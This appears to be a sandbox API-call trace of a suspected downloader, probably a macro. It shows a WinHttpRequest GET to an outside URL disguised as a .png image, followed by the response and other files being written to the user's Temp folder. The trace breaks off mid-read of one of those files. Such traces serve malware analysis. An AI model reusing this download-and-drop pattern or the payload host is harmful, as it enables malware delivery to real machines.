[0212.688] MkParseDisplayName (in: pbc=0x6fae180, szUserName="WinHTTP.WinHTTPrequest.5", pchEaten=0x15dae4, ppmk=0x15daf0 | out: pchEaten=0x15dae4, ppmk=0x15daf0*=0x0) returned 0x800401e4
[0212.698] IUnknown:Release (This=0x6fae180) returned 0x0
[0212.699] RtlUnwindEx (TargetFrame=0x15dd30, TargetIp=0x7fef41d493d, ExceptionRecord=0x0, ReturnValue=0x15de40, ContextRecord=0x15d580, HistoryTable=0x0)
[0212.723] CLSIDFromProgIDEx (in: lpszProgID="WinHTTP.WinHTTPrequest.5.1", lpclsid=0x15db98 | out: lpclsid=0x15db98*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0
[0212.738] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0212.738] CoCreateInstance (in: rclsid=0x15db98*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fef447aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x15db48 | out: ppv=0x15db48*=0x7052000) returned 0x0
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef4494590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x15db60 | out: ppvObject=0x15db60*=0x0) returned 0x80004002
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef44945a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x15db68 | out: ppvObject=0x15db68*=0x0) returned 0x80004002
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef447aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x15dc28 | out: ppvObject=0x15dc28*=0x7052000) returned 0x0
[0212.750] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x1
[0212.751] WinHttpRequest:IUnknown:AddRef (This=0x7052000) returned 0x2
[0212.751] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x1
[0212.753] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="Open", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=1) returned 0x0
[0212.755] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=1, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x15dcc8*(rgvarg=([0]=0x1086edb0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1086edc8*(varType=0x4008, wReserved1=0x1047, wReserved2=0x0, wReserved3=0x0, varVal1=0x1086efb0*="https://picstate.com/file/20260941_ugxbx/B7CHZ11.png", varVal2=0x1086efb0), [2]=0x1086ede0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=([0]=0x1086edb0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1086edc8*(varType=0x4008, wReserved1=0x1047, wReserved2=0x0, wReserved3=0x0, varVal1=0x1086efb0*="https://picstate.com/file/20260941_ugxbx/B7CHZ11.png", varVal2=0x1086efb0), [2]=0x1086ede0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e56e0) returned 0x0
[0212.792] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="SetTimeout8s", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=0) returned 0x80020006
[0212.793] RtlUnwindEx (TargetFrame=0x15dd30, TargetIp=0x7fef41d493d, ExceptionRecord=0x0, ReturnValue=0x15de40, ContextRecord=0x15d6c0, HistoryTable=0x0)
[0212.793] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="Send", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=5) returned 0x0
[0212.794] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=5, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e56a8) returned 0x0
[0216.090] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="ResponseBody", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=10) returned 0x0
[0216.090] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=10, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1086ef90, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1086ef90*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12da79b0*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x12da79d0*, rgsabound=((cElements=0x36a79, lLbound=0))), varVal2=0x1050015dd30), pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e5630) returned 0x0
[0216.092] SafeArrayCopy (in: psa=0x12da79b0, ppsaOut=0x1086eec0 | out: ppsaOut=0x1086eec0) returned 0x0
[0216.094] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x0
[0216.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.109] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.110] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.110] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x10e4e7c8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.110] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.110] CRetailMalloc_Free () returned 0xce1008570001
[0216.111] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", lpUsedDefaultChar=0x0) returned 46
[0216.112] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp"
[0216.112] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\zz11.tmp"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.117] CRetailMalloc_Alloc () returned 0x11178480
[0216.117] strcpy_s (in: _Dst=0x111784b9, _DstSize=0x2e, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned 0x0
[0216.149] _write (in: _FileHandle=3, _Buf=0x7458530*, _MaxCharCount=0x6e8 | out: _Buf=0x7458530*) returned 1768
[0216.157] _close (_FileHandle=3) returned 0
[0216.162] CRetailMalloc_Free () returned 0xb7ac54207f20001
[0216.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.162] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.162] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.162] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x10e4e8c8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.163] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.163] CRetailMalloc_Free () returned 0xce1108570001
[0216.163] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", lpUsedDefaultChar=0x0) returned 45
[0216.163] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp"
[0216.163] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.166] CRetailMalloc_Alloc () returned 0x11178600
[0216.166] strcpy_s (in: _Dst=0x11178639, _DstSize=0x2d, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp") returned 0x0
[0216.167] _write (in: _FileHandle=3, _Buf=0x13017a20*, _MaxCharCount=0x353fd | out: _Buf=0x13017a20*) returned 218109
[0216.183] _close (_FileHandle=3) returned 0
[0216.192] CRetailMalloc_Free () returned 0xb7ac54307e20001
[0216.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.192] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.192] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.192] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.193] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.193] CRetailMalloc_Free () returned 0xce1208570001
[0216.193] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", lpUsedDefaultChar=0x0) returned 49
[0216.193] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt"
[0216.193] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.195] CRetailMalloc_Alloc () returned 0x11178600
[0216.195] strcpy_s (in: _Dst=0x11178639, _DstSize=0x31, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt") returned 0x0
[0216.196] _write (in: _FileHandle=3, _Buf=0x3692fe0*, _MaxCharCount=0xf32 | out: _Buf=0x3692fe0*) returned 3890
[0216.199] _close (_FileHandle=3) returned 0
[0216.200] CRetailMalloc_Free () returned 0xb7ac54407e20001
[0216.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.200] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.200] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.200] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.201] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.201] CRetailMalloc_Free () returned 0xce1308570001
[0216.201] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", lpUsedDefaultChar=0x0) returned 46
[0216.203] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp"
[0216.204] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\zz11.tmp"), _OpenFlag=32768, _ShareFlag=64, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.204] CRetailMalloc_Alloc () returned 0x107a2850
[0216.204] strcpy_s (in: _Dst=0x107a2a88, _DstSize=0x2e, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned 0x0
[0216.204] _lseek (_FileHandle=3, _Offset=0, _Origin=1) returned 0
[0216.205] _lseek (_FileHandle=3, _Offset=0, _Origin=2) returned 1768
[0216.205] _lseek (_FileHandle=3, _Offset=0, _Origin=0) returned 0
[0216.206] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dac8, cchWideChar=1 | out: lpWideCharStr="<ផ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="?", cbMultiByte=1, lpWideCharStr=0x369daca, cchWideChar=1 | out: lpWideCharStr="?") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x369dacc, cchWideChar=1 | out: lpWideCharStr="x") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369dace, cchWideChar=1 | out: lpWideCharStr="m\槚∃) returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x369dad0, cchWideChar=1 | out: lpWideCharStr="lͩ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dad2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x369dad4, cchWideChar=1 | out: lpWideCharStr="v") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dad6, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dad8, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dada, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dadc, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dade, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dae0, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369dae2, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369dae4, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dae6, cchWideChar=1 | out: lpWideCharStr="1\槚∃) returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369dae8, cchWideChar=1 | out: lpWideCharStr=".ͩ") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369daea, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369daec, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369daee, cchWideChar=1 | out: lpWideCharStr=" \槚∃) returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369daf0, cchWideChar=1 | out: lpWideCharStr="eͩ") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369daf2, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369daf4, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369daf6, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x369daf8, cchWideChar=1 | out: lpWideCharStr="d") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dafa, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dafc, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dafe, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db00, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db02, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369db04, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369db06, cchWideChar=1 | out: lpWideCharStr="T\槛∃) returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x369db08, cchWideChar=1 | out: lpWideCharStr="Fͩ") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369db0a, cchWideChar=1 | out: lpWideCharStr="-") returned 1
